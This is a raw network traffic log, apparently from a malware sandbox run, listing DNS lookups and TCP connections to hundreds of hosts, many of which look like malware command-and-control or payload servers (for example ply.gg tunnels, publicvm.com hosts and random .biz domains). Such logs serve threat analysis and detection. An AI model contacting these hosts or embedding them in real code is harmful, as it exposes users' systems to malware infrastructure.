US 8.8.8.8:53 30.87.201.154.in-addr.arpa udp
US 8.8.8.8:53 se-blurry.biz udp
US 172.67.162.65:443 se-blurry.biz tcp
IR 185.79.156.69:443 osecweb.ir tcp
RU 176.111.174.138:443 tcp
VN 103.173.254.78:80 103.173.254.78 tcp
CA 76.67.131.51:80 76.67.131.51 tcp
TR 94.73.144.130:443 bitkiselurunsiparis.com tcp
KR 114.201.95.60:80 www.medises.co.kr tcp
US 8.8.8.8:53 65.162.67.172.in-addr.arpa udp
US 8.8.8.8:53 130.144.73.94.in-addr.arpa udp
US 8.8.8.8:53 51.131.67.76.in-addr.arpa udp
US 8.8.8.8:53 78.254.173.103.in-addr.arpa udp
US 8.8.8.8:53 dow.andylab.cn udp
BR 187.115.56.93:8081 187.115.56.93 tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.135.115:80 r11.o.lencr.org tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 172.67.136.167:443 zinc-sneark.biz tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 93.56.115.187.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 60.95.201.114.in-addr.arpa udp
US 8.8.8.8:53 115.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 167.136.67.172.in-addr.arpa udp
US 8.8.8.8:53 week-dictionary.gl.at.ply.gg udp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 104.21.88.210:443 dwell-exclaim.biz tcp
US 8.8.8.8:53 tianyinsoft.top udp
US 8.8.8.8:53 d.kpzip.com udp
US 8.8.8.8:53 210.88.21.104.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 formy-spill.biz udp
US 172.67.173.74:443 formy-spill.biz tcp
CN 116.131.57.66:80 dow.andylab.cn tcp
VE 167.250.49.155:80 167.250.49.155 tcp
US 8.8.8.8:53 74.173.67.172.in-addr.arpa udp
US 8.8.8.8:53 qiniuyunxz.yxflzs.com udp
US 8.8.8.8:53 storage.soowim.co.kr udp
HK 154.201.87.30:8888 154.201.87.30 tcp
US 8.8.8.8:53 155.49.250.167.in-addr.arpa udp
US 8.8.8.8:53 covery-mover.biz udp
US 8.8.8.8:53 artemka.spb.ru udp
IR 185.79.156.69:443 osecweb.ir tcp
US 172.67.206.64:443 covery-mover.biz tcp
CN 139.9.248.128:80 tianyinsoft.top tcp
CN 124.95.177.254:80 d.kpzip.com tcp
RU 176.113.115.203:80 176.113.115.203 tcp
CN 106.42.31.65:8088 tcp
CN 183.60.150.17:80 qiniuyunxz.yxflzs.com tcp
KR 210.216.165.152:443 storage.soowim.co.kr tcp
US 8.8.8.8:53 twizthash.net udp
CN 47.104.173.216:8082 tcp
US 172.67.206.64:443 covery-mover.biz tcp
RU 178.130.39.138:80 artemka.spb.ru tcp
KR 193.123.237.45:80 193.123.237.45 tcp
KR 210.216.165.152:80 storage.soowim.co.kr tcp
RU 185.215.113.66:80 twizthash.net tcp
US 8.8.8.8:53 down.mvip8.ru udp
CN 58.220.203.74:6713 tcp
CN 121.43.104.75:8080 tcp
AT 81.10.240.105:80 81.10.240.105 tcp
HK 103.68.192.104:80 taodianla.com tcp
US 172.67.130.102:443 down.mvip8.ru tcp
CN 110.40.51.56:5700 tcp
DE 38.242.241.140:80 38.242.241.140 tcp
US 64.234.95.70:80 64.234.95.70 tcp
CN 121.40.100.23:12616 tcp
FR 82.127.74.198:5000 82.127.74.198 tcp
SE 94.255.218.185:80 94.255.218.185 tcp
CN 111.42.156.130:8000 tcp
CN 39.103.150.56:8888 tcp
CN 39.108.237.194:80 tcp
ES 31.214.180.12:81 31.214.180.12 tcp
US 8.8.8.8:53 bitbucket.org udp
US 8.8.8.8:53 support.clz.kr udp
US 8.8.8.8:53 znrq.zifwxq.cn udp
US 8.8.8.8:53 palharesinformatica.com.br udp
US 8.8.8.8:53 eoufaoeuhoauengi.su udp
US 8.8.8.8:53 utorrent-backup-server5.top udp
US 8.8.8.8:53 dz0nhlj1q8ac3.cloudfront.net udp
CN 180.117.160.2:80 tcp
IE 185.166.142.21:443 bitbucket.org tcp
RU 185.215.113.66:80 eoufaoeuhoauengi.su tcp
KR 115.71.237.171:80 support.clz.kr tcp
KR 211.220.36.213:80 211.220.36.213 tcp
BG 87.121.86.16:80 utorrent-backup-server5.top tcp
CN 101.200.223.34:80 tcp
BR 186.225.153.226:443 palharesinformatica.com.br tcp
CN 120.52.95.247:80 znrq.zifwxq.cn tcp
CN 8.138.81.152:5555 tcp
IE 185.166.142.23:443 bitbucket.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 172.67.162.65:443 se-blurry.biz tcp
US 8.8.8.8:53 noithaticon.vn udp
US 8.8.8.8:53 safe.ywxww.net udp
US 8.8.8.8:53 update.itopvpn.com udp
US 8.8.8.8:53 file.edunet.ac udp
CN 119.167.70.110:13332 tcp
IE 185.166.142.22:443 bitbucket.org tcp
RU 83.149.17.194:80 83.149.17.194 tcp
CN 43.241.17.145:8899 tcp
CN 52.83.32.119:8899 tcp
IL 81.218.175.244:80 81.218.175.244 tcp
US 8.8.8.8:53 print-vexer.biz udp
PL 152.199.23.214:80 update.itopvpn.com tcp
US 172.67.181.192:443 print-vexer.biz tcp
US 8.8.8.8:53 www.grupodulcemar.pe udp
DE 217.92.214.15:8088 217.92.214.15 tcp
KR 221.143.46.92:80 file.edunet.ac tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
PE 161.132.57.101:80 www.grupodulcemar.pe tcp
VN 14.243.221.170:2654 tcp
US 8.8.8.8:53 t.me udp
CN 101.126.11.168:80 tcp
NL 149.154.167.99:443 t.me tcp
US 172.67.136.167:443 zinc-sneark.biz tcp
ES 178.156.109.69:81 178.156.109.69 tcp
US 8.8.8.8:53 cfs13.tistory.com udp
US 8.8.8.8:53 melkie.cyou udp
US 8.8.8.8:53 impend-differ.biz udp
DE 116.203.127.32:443 melkie.cyou tcp
HK 43.132.13.252:9000 43.132.13.252 tcp
US 8.8.8.8:53 steamcommunity.com udp
KR 121.53.218.30:80 cfs13.tistory.com tcp
GB 104.82.234.109:443 steamcommunity.com tcp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 ipfs.io udp
US 209.94.90.1:443 ipfs.io tcp
US 104.21.88.210:443 dwell-exclaim.biz tcp
HK 156.245.12.57:8000 156.245.12.57 tcp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 23-122-210-174.lightspeed.cicril.sbcglobal.net udp
BG 130.185.193.208:8080 130.185.193.208 tcp
KR 203.232.37.151:80 203.232.37.151 tcp
US 8.8.8.8:53 xss-1253555722.cos.ap-singapore.myqcloud.com udp
RU 185.215.113.205:8080 185.215.113.205 tcp
US 8.8.8.8:53 download.skycn.com udp
US 23.122.210.174:80 23-122-210-174.lightspeed.cicril.sbcglobal.net tcp
ES 217.125.11.90:8080 tcp
DE 116.203.127.32:443 melkie.cyou tcp
SG 43.152.64.193:80 xss-1253555722.cos.ap-singapore.myqcloud.com tcp
KR 183.115.102.3:80 183.115.102.3 tcp
IT 95.255.114.11:80 95.255.114.11 tcp
US 172.67.173.74:443 formy-spill.biz tcp
IR 185.79.156.69:443 osecweb.ir tcp
DE 116.203.127.32:443 melkie.cyou tcp
CN 122.51.183.116:443 tcp
CN 116.114.98.35:80 download.skycn.com tcp
CN 47.104.233.213:14319 tcp
CN 47.108.236.50:8090 tcp
DE 116.203.127.32:443 melkie.cyou tcp
CN 112.33.27.73:443 tcp
US 209.141.35.225:80 209.141.35.225 tcp
CN 223.247.198.16:8072 tcp
US 72.219.74.233:8080 72.219.74.233 tcp
US 8.8.8.8:53 support.clz.kr udp
US 172.67.181.44:443 dare-curbys.biz tcp
KR 115.71.237.171:80 support.clz.kr tcp
US 172.67.181.192:443 print-vexer.biz tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 64.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 203.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 152.165.216.210.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 138.39.130.178.in-addr.arpa udp
US 8.8.8.8:53 66.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 105.240.10.81.in-addr.arpa udp
US 8.8.8.8:53 45.237.123.193.in-addr.arpa udp
US 8.8.8.8:53 102.130.67.172.in-addr.arpa udp
US 8.8.8.8:53 140.241.242.38.in-addr.arpa udp
US 8.8.8.8:53 198.74.127.82.in-addr.arpa udp
US 8.8.8.8:53 185.218.255.94.in-addr.arpa udp
US 8.8.8.8:53 12.180.214.31.in-addr.arpa udp
US 8.8.8.8:53 70.95.234.64.in-addr.arpa udp
US 8.8.8.8:53 21.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 16.86.121.87.in-addr.arpa udp
US 8.8.8.8:53 226.153.225.186.in-addr.arpa udp
US 8.8.8.8:53 213.36.220.211.in-addr.arpa udp
US 8.8.8.8:53 171.237.71.115.in-addr.arpa udp
US 8.8.8.8:53 23.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 22.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 194.17.149.83.in-addr.arpa udp
US 8.8.8.8:53 244.175.218.81.in-addr.arpa udp
US 8.8.8.8:53 214.23.199.152.in-addr.arpa udp
US 8.8.8.8:53 192.181.67.172.in-addr.arpa udp
US 8.8.8.8:53 15.214.92.217.in-addr.arpa udp
US 8.8.8.8:53 92.46.143.221.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 69.109.156.178.in-addr.arpa udp
US 8.8.8.8:53 32.127.203.116.in-addr.arpa udp
US 8.8.8.8:53 252.13.132.43.in-addr.arpa udp
US 8.8.8.8:53 30.218.53.121.in-addr.arpa udp
US 8.8.8.8:53 1.90.94.209.in-addr.arpa udp
US 8.8.8.8:53 57.12.245.156.in-addr.arpa udp
US 8.8.8.8:53 151.37.232.203.in-addr.arpa udp
US 8.8.8.8:53 208.193.185.130.in-addr.arpa udp
US 8.8.8.8:53 205.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 174.210.122.23.in-addr.arpa udp
US 8.8.8.8:53 193.64.152.43.in-addr.arpa udp
US 8.8.8.8:53 3.102.115.183.in-addr.arpa udp
US 8.8.8.8:53 225.35.141.209.in-addr.arpa udp
US 8.8.8.8:53 233.74.219.72.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 11.114.255.95.in-addr.arpa udp
US 8.8.8.8:53 www.maan2u.com udp
US 8.8.8.8:53 impend-differ.biz udp
MY 103.82.231.117:443 www.maan2u.com tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 httpbin.org udp
US 34.224.200.202:443 httpbin.org tcp
GB 104.82.234.109:443 steamcommunity.com tcp
KR 211.168.94.177:3389 tcp
US 8.8.8.8:53 117.231.82.103.in-addr.arpa udp
US 8.8.8.8:53 202.200.224.34.in-addr.arpa udp
MY 103.82.231.117:443 www.maan2u.com tcp
US 8.8.8.8:53 nav.smartscreen.microsoft.com udp
GB 51.140.244.186:443 nav.smartscreen.microsoft.com tcp
US 104.21.82.174:443 marshal-zhukov.com tcp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.197.79.204.in-addr.arpa udp
PL 217.12.206.79:80 tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 data-edge.smartscreen.microsoft.com udp
GB 172.165.69.228:443 data-edge.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 data-edge.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 data-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 228.69.165.172.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
CN 1.189.232.189:80 d.kpzip.com tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
NL 81.161.238.172:8705 tcp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 29.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 home.fvtekx5vs.top udp
DE 116.203.127.32:443 melkie.cyou tcp
IT 34.17.28.197:80 home.fvtekx5vs.top tcp
CN 218.12.76.159:80 znrq.zifwxq.cn tcp
CN 111.6.201.155:80 download.caihong.com tcp
US 8.8.8.8:53 197.28.17.34.in-addr.arpa udp
RU 176.111.174.138:443 tcp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 cfs10.blog.daum.net udp
US 8.8.8.8:53 soft.wsyhn.com udp
US 8.8.8.8:53 src1.minibai.com udp
US 8.8.8.8:53 www.bkzj.wang udp
US 8.8.8.8:53 static-91-225-132-57.devs.futuro.pl udp
US 8.8.8.8:53 softdl.360tpcdn.com udp
US 8.8.8.8:53 a12xxx1.oss-cn-hongkong.aliyuncs.com udp
US 8.8.8.8:53 utorrent-backup-server.top udp
US 8.8.8.8:53 www.maxmoney.com udp
US 8.8.8.8:53 1717.1000uc.com udp
US 8.8.8.8:53 sms-szfang.com udp
US 8.8.8.8:53 aefieiaehfiaehr.top udp
DE 116.203.127.32:443 melkie.cyou tcp
N/A 224.0.0.251:5353 udp
DE 116.203.127.32:443 melkie.cyou tcp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 antivirus-helper.publicvm.com udp
US 8.8.8.8:53 softcatalog.ru udp
US 8.8.8.8:53 ldcdn.ldmnq.com udp
US 8.8.8.8:53 api.52kkg.com udp
US 8.8.8.8:53 mohibkal.publicvm.com udp
CN 221.204.72.204:80 dow.andylab.cn tcp
VN 103.167.89.125:80 103.167.89.125 tcp
FR 52.222.153.112:443 dz0nhlj1q8ac3.cloudfront.net tcp
RU 176.113.115.37:80 176.113.115.37 tcp
VN 103.221.220.14:443 noithaticon.vn tcp
SG 168.138.162.78:80 168.138.162.78 tcp
RU 195.46.176.2:80 195.46.176.2 tcp
RU 193.233.48.194:80 193.233.48.194 tcp
CN 59.175.183.106:6713 tcp
HK 156.245.12.220:8000 156.245.12.220 tcp
AU 110.143.54.213:80 110.143.54.213 tcp
EC 186.3.78.195:80 186.3.78.195 tcp
US 8.8.8.8:53 desquer.ens.uabc.mx udp
CN 36.138.125.70:8089 tcp
CN 61.182.69.190:11111 tcp
JP 111.217.175.54:80 111.217.175.54 tcp
CN 39.105.31.193:1389 tcp
CN 61.131.3.86:9991 tcp
CN 101.133.156.69:7777 tcp
CN 47.120.46.210:80 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
DE 136.243.111.71:741 antivirus-helper.publicvm.com tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
IT 34.17.28.197:80 home.fvtekx5vs.top tcp
US 8.8.8.8:53 112.153.222.52.in-addr.arpa udp
US 8.8.8.8:53 37.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 2.176.46.195.in-addr.arpa udp
US 8.8.8.8:53 194.48.233.193.in-addr.arpa udp
US 8.8.8.8:53 195.78.3.186.in-addr.arpa udp
US 8.8.8.8:53 220.12.245.156.in-addr.arpa udp
US 8.8.8.8:53 125.89.167.103.in-addr.arpa udp
US 8.8.8.8:53 14.220.221.103.in-addr.arpa udp
US 8.8.8.8:53 78.162.138.168.in-addr.arpa udp
US 8.8.8.8:53 213.54.143.110.in-addr.arpa udp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 home.fvtekx5vs.top udp
IT 34.17.28.197:80 home.fvtekx5vs.top tcp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 71.111.243.136.in-addr.arpa udp
US 8.8.8.8:53 54.175.217.111.in-addr.arpa udp
DE 94.156.177.41:80 94.156.177.41 tcp
PL 91.225.132.57:80 static-91-225-132-57.devs.futuro.pl tcp
DE 185.88.60.242:80 nerve.untergrund.net tcp
CN 101.71.255.146:8195 tcp
HK 47.79.66.205:80 a12xxx1.oss-cn-hongkong.aliyuncs.com tcp
CN 45.117.11.68:443 soft.wsyhn.com tcp
MY 210.19.94.140:443 www.maxmoney.com tcp
HK 47.243.125.164:80 www.bkzj.wang tcp
BG 87.121.86.16:80 utorrent-backup-server.top tcp
GB 79.133.176.178:80 1717.1000uc.com tcp
CN 123.234.2.61:80 src1.minibai.com tcp
KR 121.53.202.238:80 cfs10.blog.daum.net tcp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
US 104.192.108.17:80 softdl.360tpcdn.com tcp
JP 137.220.142.71:443 sms-szfang.com tcp
HK 156.245.12.87:8000 156.245.12.87 tcp
VN 14.243.221.170:2654 tcp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 178.176.133.79.in-addr.arpa udp
US 8.8.8.8:53 242.60.88.185.in-addr.arpa udp
US 8.8.8.8:53 41.177.156.94.in-addr.arpa udp
US 8.8.8.8:53 57.132.225.91.in-addr.arpa udp
US 8.8.8.8:53 17.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 87.12.245.156.in-addr.arpa udp
US 8.8.8.8:53 71.142.220.137.in-addr.arpa udp
US 8.8.8.8:53 140.94.19.210.in-addr.arpa udp
US 8.8.8.8:53 164.125.243.47.in-addr.arpa udp
US 8.8.8.8:53 238.202.53.121.in-addr.arpa udp
US 8.8.8.8:53 205.66.79.47.in-addr.arpa udp
RU 31.41.244.11:80 31.41.244.11 tcp
CN 124.71.73.181:85 tcp
DE 116.203.127.32:443 melkie.cyou tcp
CN 122.228.207.55:80 qiniuyunxz.yxflzs.com tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 wz.3911.com udp
GB 82.31.159.47:80 82.31.159.47 tcp
US 8.8.8.8:53 data.discuz.mobi udp
US 8.8.8.8:53 sgz-1302338321.cos.ap-guangzhou.myqcloud.com udp
GB 20.26.156.215:443 github.com tcp
GB 165.220.134.146:80 165.220.134.146 tcp
CN 61.131.3.86:9991 tcp
US 8.8.8.8:53 hseda.com udp
US 8.8.8.8:53 cfs13.tistory.com udp
US 8.8.8.8:53 host-95-255-114-11.business.telecomitalia.it udp
US 8.8.8.8:53 utorrent-backup-server3.top udp
RU 88.212.252.98:443 softcatalog.ru tcp
GB 163.181.154.239:443 ldcdn.ldmnq.com tcp
MX 148.231.192.3:80 desquer.ens.uabc.mx tcp
US 194.147.99.181:80 api.52kkg.com tcp
US 8.8.8.8:53 47.159.31.82.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 239.154.181.163.in-addr.arpa udp
US 8.8.8.8:53 98.252.212.88.in-addr.arpa udp
US 8.8.8.8:53 181.99.147.194.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 146.134.220.165.in-addr.arpa udp
US 8.8.8.8:53 3.192.231.148.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
CN 203.2.65.29:8088 tcp
HK 103.43.18.71:88 103.43.18.71 tcp
HK 103.43.18.71:88 103.43.18.71 tcp
CN 203.2.65.29:8086 tcp
HK 58.152.32.99:8001 58.152.32.99 tcp
DO 181.36.153.151:80 181.36.153.151 tcp
RU 89.175.186.155:80 89.175.186.155 tcp
CN 122.51.183.116:1234 tcp
RU 89.175.24.90:8080 89.175.24.90 tcp
VN 113.160.249.9:80 113.160.249.9 tcp
JP 137.220.142.73:443 sms-szfang.com tcp
US 8.8.8.8:53 bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link udp
FR 52.222.153.24:443 dz0nhlj1q8ac3.cloudfront.net tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 155.186.175.89.in-addr.arpa udp
US 8.8.8.8:53 24.153.222.52.in-addr.arpa udp
US 8.8.8.8:53 151.153.36.181.in-addr.arpa udp
US 8.8.8.8:53 71.18.43.103.in-addr.arpa udp
US 8.8.8.8:53 99.32.152.58.in-addr.arpa udp
US 8.8.8.8:53 9.249.160.113.in-addr.arpa udp
US 8.8.8.8:53 73.142.220.137.in-addr.arpa udp
CN 222.244.110.238:8089 tcp
CN 121.4.173.197:443 data.discuz.mobi tcp
CN 120.26.3.86:80 wz.3911.com tcp
IT 95.255.114.11:80 host-95-255-114-11.business.telecomitalia.it tcp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 home.sevkk17sr.top udp
RU 176.111.174.138:443 tcp
NL 81.161.238.172:8705 tcp
CN 124.95.180.151:80 d.kpzip.com tcp
CN 117.72.70.169:80 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
CN 218.12.76.158:80 znrq.zifwxq.cn tcp
CN 113.219.195.65:80 download.caihong.com tcp
CN 123.6.40.224:80 dow.andylab.cn tcp
CN 159.75.57.35:443 sgz-1302338321.cos.ap-guangzhou.myqcloud.com tcp
BG 87.121.86.16:80 utorrent-backup-server3.top tcp
CN 211.149.230.178:80 hseda.com tcp
KR 211.249.219.23:80 cfs13.tistory.com tcp
RU 195.46.176.2:80 195.46.176.2 tcp
US 8.8.8.8:53 360down7.miiyun.cn udp
US 8.8.8.8:53 www.flechabusretiro.com.ar udp
US 8.8.8.8:53 230.sub-166-166-188.myvzw.com udp
US 8.8.8.8:53 update-checker-status.cc udp
RU 176.111.174.138:443 tcp
US 209.94.90.3:443 bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link tcp
HK 103.43.18.19:88 103.43.18.19 tcp
US 8.8.8.8:53 stdown.dinju.com udp
US 8.8.8.8:53 perfectperu.com udp
JP 137.220.142.69:443 sms-szfang.com tcp
US 8.8.8.8:53 cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net udp
HK 134.122.129.19:80 134.122.129.19 tcp
US 166.150.43.236:80 166.150.43.236 tcp
FR 52.222.153.187:443 dz0nhlj1q8ac3.cloudfront.net tcp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
CN 39.103.217.92:80 tcp
VE 167.250.49.155:80 167.250.49.155 tcp
CN 218.22.21.248:58080 tcp
US 159.250.122.151:8081 159.250.122.151 tcp
CN 47.94.196.131:80 tcp
JP 141.147.155.36:8888 141.147.155.36 tcp
US 8.8.8.8:53 23.219.249.211.in-addr.arpa udp
US 8.8.8.8:53 3.90.94.209.in-addr.arpa udp
US 8.8.8.8:53 19.18.43.103.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
CN 203.2.65.29:8085 tcp
US 166.166.188.230:80 230.sub-166-166-188.myvzw.com tcp
US 66.63.187.231:80 66.63.187.231 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
HK 156.245.12.57:8000 156.245.12.57 tcp
US 8.8.8.8:53 69.142.220.137.in-addr.arpa udp
US 8.8.8.8:53 187.153.222.52.in-addr.arpa udp
US 8.8.8.8:53 19.129.122.134.in-addr.arpa udp
US 8.8.8.8:53 236.43.150.166.in-addr.arpa udp
US 8.8.8.8:53 151.122.250.159.in-addr.arpa udp
US 8.8.8.8:53 36.155.147.141.in-addr.arpa udp
US 8.8.8.8:53 230.188.166.166.in-addr.arpa udp
BG 87.121.86.16:80 update-checker-status.cc tcp
AR 200.105.67.246:80 www.flechabusretiro.com.ar tcp
CN 120.52.95.247:80 360down7.miiyun.cn tcp
GB 82.31.159.47:80 cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net tcp
CN 221.204.16.62:80 src1.minibai.com tcp
KR 59.29.46.120:80 59.29.46.120 tcp
US 8.8.8.8:53 246.67.105.200.in-addr.arpa udp
US 24.252.169.236:80 24.252.169.236 tcp
DE 116.203.127.32:443 melkie.cyou tcp
AR 200.58.120.6:80 perfectperu.com tcp
CN 218.29.50.234:80 stdown.dinju.com tcp
CN 111.231.145.137:8888 tcp
US 8.8.8.8:53 236.169.252.24.in-addr.arpa udp
US 158.101.35.62:9000 158.101.35.62 tcp
KR 221.143.49.222:80 221.143.49.222 tcp
US 24.93.22.147:8081 24.93.22.147 tcp
FR 52.222.153.25:443 dz0nhlj1q8ac3.cloudfront.net tcp
US 8.8.8.8:53 120.46.29.59.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
CN 110.40.32.156:80 qiniuyunxz.yxflzs.com tcp
TN 41.230.16.223:8889 41.230.16.223 tcp
TW 203.204.217.190:8080 203.204.217.190 tcp
NL 185.202.113.6:443 tcp
HK 156.245.12.220:8000 156.245.12.220 tcp
US 8.8.8.8:53 25.153.222.52.in-addr.arpa udp
US 8.8.8.8:53 222.49.143.221.in-addr.arpa udp
US 8.8.8.8:53 62.35.101.158.in-addr.arpa udp
US 8.8.8.8:53 147.22.93.24.in-addr.arpa udp
US 8.8.8.8:53 6.120.58.200.in-addr.arpa udp
HK 182.16.35.197:80 tcp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
KR 146.56.118.137:80 146.56.118.137 tcp
US 8.8.8.8:53 223.16.230.41.in-addr.arpa udp
US 8.8.8.8:53 6.113.202.185.in-addr.arpa udp
US 8.8.8.8:53 190.217.204.203.in-addr.arpa udp
RU 176.111.174.138:443 tcp
RU 95.163.152.69:9439 95.163.152.69 tcp
US 8.8.8.8:53 137.118.56.146.in-addr.arpa udp
CN 123.132.224.187:14417 tcp
VE 167.250.49.155:80 167.250.49.155 tcp
CN 124.70.140.100:80 tcp
US 68.59.153.1:49274 68.59.153.1 tcp
US 8.8.8.8:53 karoonpc.com udp
US 8.8.8.8:53 rddissisifigifidi.net udp
US 8.8.8.8:53 1.153.59.68.in-addr.arpa udp
US 8.8.8.8:53 69.152.163.95.in-addr.arpa udp
CN 223.247.198.16:14319 tcp
RU 185.215.113.66:80 rddissisifigifidi.net tcp
IR 217.172.98.87:80 karoonpc.com tcp
US 8.8.8.8:53 twizt.net udp
US 8.8.8.8:53 utorrent-backup-server2.top udp
US 8.8.8.8:53 87.98.172.217.in-addr.arpa udp
RU 195.46.176.2:80 195.46.176.2 tcp
HK 43.132.12.146:9000 43.132.12.146 tcp
US 8.8.8.8:53 adf6.adf6.com udp
US 8.8.8.8:53 download.suxiazai.com udp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 146.12.132.43.in-addr.arpa udp
RU 176.113.115.178:80 176.113.115.178 tcp
ES 178.60.25.240:80 178.60.25.240 tcp
CN 117.157.17.194:9999 tcp
RU 185.215.113.66:80 twizt.net tcp
BG 87.121.86.16:80 utorrent-backup-server2.top tcp
CN 112.124.28.233:5566 tcp
HK 156.245.12.221:8000 156.245.12.221 tcp
US 104.21.67.89:80 adf6.adf6.com tcp
IN 116.206.151.203:478 116.206.151.203 tcp
US 8.8.8.8:53 a18qqq1.oss-cn-hongkong.aliyuncs.com udp
CN 42.193.42.92:80 tcp
CN 1.180.210.62:80 download.suxiazai.com tcp
US 8.8.8.8:53 178.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 240.25.60.178.in-addr.arpa udp
US 8.8.8.8:53 89.67.21.104.in-addr.arpa udp
US 8.8.8.8:53 203.151.206.116.in-addr.arpa udp
US 8.8.8.8:53 221.12.245.156.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
US 8.8.8.8:53 down.pcclear.com udp
BG 87.121.86.16:80 utorrent-backup-server2.top tcp
HK 47.79.66.208:443 a18qqq1.oss-cn-hongkong.aliyuncs.com tcp
KR 146.56.118.137:80 146.56.118.137 tcp
US 8.8.8.8:53 dl.natgo.cn udp
US 8.8.8.8:53 208.66.79.47.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
NL 81.161.238.172:8705 tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 mohibkal.publicvm.com udp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
CN 14.205.47.205:80 d.kpzip.com tcp
US 20.83.148.22:8080 tcp
DE 116.203.127.32:443 melkie.cyou tcp
HK 182.16.35.197:80 tcp
US 8.8.8.8:53 22.148.83.20.in-addr.arpa udp
VN 14.243.221.170:2654 tcp
RU 176.111.174.138:443 tcp
US 8.8.8.8:53 week-dictionary.gl.at.ply.gg udp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
DE 116.203.127.32:443 melkie.cyou tcp
KR 152.67.212.187:443 tcp
CN 183.204.211.252:80 download.caihong.com tcp
CN 120.52.95.246:80 360down7.miiyun.cn tcp
CN 116.142.249.98:80 stdown.dinju.com tcp
CN 159.75.57.69:443 sgz-1302338321.cos.ap-guangzhou.myqcloud.com tcp
US 8.8.8.8:53 187.212.67.152.in-addr.arpa udp
RU 176.111.174.138:443 tcp
CN 218.12.76.158:80 360down7.miiyun.cn tcp
CN 59.83.212.226:80 src1.minibai.com tcp
KR 152.67.212.187:443 tcp
CN 123.6.40.248:80 stdown.dinju.com tcp
IE 185.166.142.22:443 bitbucket.org tcp
KR 211.110.226.148:80 down.pcclear.com tcp
CN 118.178.133.241:65500 tcp
US 8.8.8.8:53 148.226.110.211.in-addr.arpa udp
RU 176.111.174.138:443 tcp
RU 176.111.174.138:443 tcp
NL 81.161.238.172:8705 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
RU 176.111.174.138:443 tcp
VN 14.243.221.170:2654 tcp
RU 176.111.174.138:443 tcp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
RU 176.111.174.138:443 tcp
